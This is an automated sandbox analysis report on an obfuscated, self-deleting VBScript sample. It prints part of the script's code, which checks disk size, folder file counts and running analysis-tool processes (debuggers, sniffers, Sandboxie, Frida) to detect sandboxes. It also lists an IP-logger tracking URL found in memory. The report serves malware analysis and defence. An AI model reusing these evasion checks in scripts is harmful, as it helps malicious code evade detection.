
Analysis Report files#_56117.vbs

Overview

General Information

Sample Name: files#_56117.vbs
MD5: 147091e61ec59f67ab598d26f15ad0e7
SHA1: 0dd98cc3868b7896b4ebca00e55ec3ce2bdc4118
SHA256: 2591ec56069e41c33309c3042083c047c360c62454d52f734a79be21540c2967

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)

Startup

  • System is w10x64
  • wscript.exe (PID: 5960, cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs', MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: files#_56117.vbs    Virustotal: Detection: 8%

Java / VBScript file with very long strings (likely obfuscated code)
Source: files#_56117.vbs    Initial sample: Strings found which are bigger than 50

Further findings:
Source: wscript.exe, 00000000.00000003.1075890959.0000015A5E11C000.00000004.00000001.sdmp    String found in binary or memory: https://iplogger.org/1N3Ei7
Source: wscript.exe, 00000000.00000003.1076460066.0000015A5E279000.00000004.00000001.sdmp    String found in binary or memory: https://iplogger.org/1N3Ei7u
(iplogger.org is a link-tracking service that records the IP address of whoever opens the link. It is the only network indicator in this run; no DNS activity was recorded, consistent with the script bailing out of its environment checks before reaching that stage.)
Source: classification engine    Classification label: mal68.evad.winVBS@1/0@0/0 (score 68, evasive, Windows VBScript)
Source: unknown    Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs'
Source: C:\Windows\System32\wscript.exe    Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy settings, consulted by the script host before the script runs)
Source: C:\Windows\System32\wscript.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript script engine, vbscript.dll, being located for the .vbs host)

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe    Anti Malware Scan Interface (script buffer as handed to AMSI; the capture begins mid-statement and is cut off at the end; line breaks restored, filler comments left as they are):

        ...WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) Then
            Exit Function
        End If
        Set LouisianaService = GetObject("winmgmts:\\.\root\cimv2")
        Set burbanklItems = LouisianaService.ExecQuery("Select * from Win32_LogicalDisk")
        For Each LCVPVzmFYoATz In burbanklItems
            ' pont. flag lab granite proper Harcourt rutile dwarves. prospect biscuit depend adjacent farfetched anise gaggle sashay whig whereof lacquer. blocky greensward epistle
            tagWRLpxzbdZ = tagWRLpxzbdZ + Int(LCVPVzmFYoATz.Size / ((1073742868 - (950 - 2.0)) - (75 + 21.0)))
        Next
        If tagWRLpxzbdZ < ((70 + ((87 - 3.0) + 285.0)) - 379.0) Then
            PAnMjKKlKawcyHN
        End If
        ' oriole mendacious perpetuate symmetry curfew, gotten Arlene Segundo hall radioactive revving, Purcell eleventh lenticular
    End Function

    Function UWbEE()
        REM auction saddlebag chamois poi wrath Copenhagen twentyfold cubbyhole earmark hymn hypothermia endomorphism coagulable
        on error resume next
        If (InStr(WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) Then
            Exit Function
        End If
        controlled = Array("catheter newsletter supple plaid indict groggy permissive clang fanfold. 5436813 vivid lumbago abbe maw glissade550 hyphenate smell Ludwig rhythm chevy299 Gonzales sphagnum proprioception Ramo ")
        Wellesley = (((40 + 6657.0) - 203.0) - (53 + 6438.0))
        REM aniline crow censure anatomy Berniece fest Cluj787 Acapulco fernery adulate explicable Gustafson cautious appropriate shun FCC basidiomycetes processor. 7120026 Bangor farina officialdom mallow tactful latus Hutchinson vaccinate schooner Cyrus rear lithography adjacent238 groat CERN, 8768946 impart
        wiZSZrk = (((79 + 15.0) + (-16.0)) + (-(61 + 14.0)))
        If CreateObject("Scripting.FileSystemObject").GetFolder(LHnoyaVcivO).Files.Count < Wellesley Then
            PAnMjKKlKawcyHN
        End If
        Set glJpk = CreateObject("WScript.Shell")
        polite = glJpk.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"
        If CreateObject("Scripting.FileSystemObject").GetFolder(polite).Files.Count < wiZSZrk Then
            PAnMjKKlKawcyHN
        End If
        REM tablespoonful chorus Kobayashi lop gallant brisk varnish. pedagogic success expanse ornament archetype, 9928097 classmate monel Koenigsberg mimicry seasonal Norton contravariant hallmark coexist onetime parentheses Davis. 4942457 pounce525, clomp crook dispensable semantic Scorpio poi573. imprint serum, 4354814 datura Auriga broach Achilles concurrent hormonal concertina, Putnam scathing semantic413 worktable, scion sceptic. were Laredo. cabinetry
        ' telephotography historian pleural hot occipital bout lord diadem determinacy eminent321 loggerhead Himalaya war amnesty osmium rye Spector rootstock Hitachi pronunciation Barnes safe
    End Function

    Function zQrVl()
        Dim iEveXErawdMlYD: Set iEveXErawdMlYD = CreateObject("Scripting.FileSystemObject")
        Dim EHQphxSk: Set EHQphxSk = CreateObject("Shell.Application")
        Shelton = Array("downwind longitudinal pawnshop juke sale grief Albrecht parentage. 1561961 mask hoar Garrisonian chamois253 cloak meridional scrooge furlough tyke awoke Macadamia Perseus boxcar Shaffer pioneer, f

Reading the buffer: the random-word comments and the unused Array literals are filler; the only live logic is three environment checks. Each check compares a measurement against a threshold written as a parenthesised arithmetic expression, and each calls PAnMjKKlKawcyHN (defined outside the captured buffer) when the environment looks like an analysis machine: the summed Win32_LogicalDisk.Size across all logical disks, the file count of a folder named by LHnoyaVcivO, and the file count of %USERPROFILE%\Downloads. The InStr(WScript.ScriptName, cStr(864872629)) guard skips a check when the script's file name contains that number, which reads like an author-side switch for testing.

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\System32\wscript.exe    File deleted: c:\users\user\desktop\files#_56117.vbs

Further findings:
Source: C:\Windows\System32\wscript.exe    Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe    WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
The process names below come from an Array literal in the script (the last source line shows its tail): debuggers, API and registry monitors, packet sniffers, Sandboxie and Frida components. The stray characters around some names are adjacent bytes in the memory dump, not part of the name.
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmp    Binary or memory strings: AUTORUNSC.EXE, SBIECTRL.EXE, APISPY.EXE, SBIESVC.EXE, SCKTOOL.EXE;HQ, IDAQ.EXET, IMPORTREC.EXE, Q?$SANDBOXIERPCSS.EXEV5, :FRIDA-WINJECTOR-HELPER-32.EXE, PEID.EXE#Z, SYSANALYZER.EXEA, SYSER.EXE=, PETOOLS.EXEJ, OLLYDBG.EXE, HOOKEXPLORER.EXE, AUTORUNS.EXE@, HOOKANAAPP.EXE, :FRIDA-WINJECTOR-HELPER-64.EXE, A9$BEHAVIORDUMPER.EXEQ, IDAG.EXE:V, FORTITRACER.EXEA, avz.exe, icesword.exe, ollydbg.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmp    Binary or memory strings: EMUL.EXE, $FAKEHTTPSERVER.EXE, REGMON.EXEIK, WINDBG.EXE, WINDUMP.EXE, PROCMON.EXE, NETSNIFFER.EXEK, TCPDUMP.EXE, FILEMON.EXET, U.SANDBOXIEDCOMLAUNCH.EXE, REGSHOT.EXE, DUMPCAP.EXE, WIRESHARK.EXE, procmon.exe, tcpview.exe, wireshark.exe, cports.exe, lordpe.exe, regshot.exe
Source: wscript.exe, 00000000.00000003.1086279749.0000015A61629000.00000004.00000001.sdmp    Binary or memory string (tail of the script's Array literal): ESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")

Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe    Window found: window name: WSH-Timer

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 468    Thread sleep time: -30000s >= -30000s

Program does not show much activity (idle)
Source: all processes    Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Further findings:
Source: wscript.exe, 00000000.00000002.1091015012.0000015A61D00000.00000002.00000001.sdmp    Binary or memory strings: "A Virtual Machine could not be started because Hyper-V is not installed.", "A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.", "The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.", "An unknown internal message was received by the Hyper-V Compute Service." (standard Windows HCS_E_* error-message text from winerror.h; a generic virtualisation-keyword hit, not evidence that the script itself checks for Hyper-V)
Source: C:\Windows\System32\wscript.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a per-install identifier often read to fingerprint the host)

Mitre Att&ck Matrix

Techniques matched by this analysis (the trailing digits are the match markers printed in the report's matrix):

  • Execution: Windows Management Instrumentation (1); Scripting (121)
  • Defense Evasion: Virtualization/Sandbox Evasion (1); Scripting (121); File Deletion (1); Obfuscated Files or Information (1)
  • Discovery: Virtualization/Sandbox Evasion (1); Security Software Discovery (211); System Information Discovery (2)
